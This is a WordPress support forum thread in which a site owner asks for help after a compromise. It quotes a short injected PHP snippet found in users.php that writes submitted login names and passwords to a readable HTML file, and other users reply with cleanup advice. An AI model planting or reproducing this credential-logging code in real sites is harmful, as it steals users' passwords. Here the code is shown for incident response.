Someone hacked my site?

  • nash9988

    (@nash9988)


    8 years ago

    Hi,
    I’m using your plugin on my site.
    I found interesting files in my /wp-includes/Text folder.
    There are 2 html files what contains usernames and passwords.
    File names: members.html, index.html
    After I logged in my site something added my username and password to the index.html file.

    Can you help me find the file what creates these files?
    Can your plugin help me to solve this issue?

    Thanks for your help.

Viewing 4 replies - 1 through 4 (of 4 total)
  • Thread Starter nash9988

    (@nash9988)

    I think yes, someone hacked my site.
    I found this code in my users.php:

    $myFile ="wp-includes/Text/index.html";
$fh = fopen($myFile, 'a');
fwrite($fh,$_POST['log']);
fwrite($fh, "    ");
fwrite($fh, $_POST['pwd']);
fwrite($fh, "</br>");
fclose($fh);

    Can I check all of my system files somehow?

    wp_mattoo

    (@mattoo64)

    I know that Wordfence scan feature can help to detect abnormal/changed files

    but beware when installing it, not to activate to many options that could interact with iTsec. Actually in your current situation, do the shortest :

    1. install/activate wordfence with default
    2. scan you site from wordfence, identify hacked files
    3. deactivate wordfence (optional)
    4. clean / change all passwords / enforce security
    5. update wp, make sure you don’t use unmaintained pluggins

    good luck…

    ps : the best would of course to understand where it came from, and I’m not expert enough to give you clues. However, try to enforce the iTsec params, – it should definitely help.

    Matt

    • This reply was modified 8 years ago by wp_mattoo.
    pronl

    (@pronl)

    @nash9988

    There is no point in doing anything without first determining the attack vector that was used to compromise the server.
    Contact your hosting provider and share the info with them. They’ll probably know what to do.

    Thread Starter nash9988

    (@nash9988)

    Thanks for your help, I compared my current wordpress core files with a downloaded version(from www.remarpro.com), and there is no other difference between the two version.
    I will contact my hosting provider.

    Thanks again.

Viewing 4 replies - 1 through 4 (of 4 total)
  • The topic ‘Someone hacked my site?’ is closed to new replies.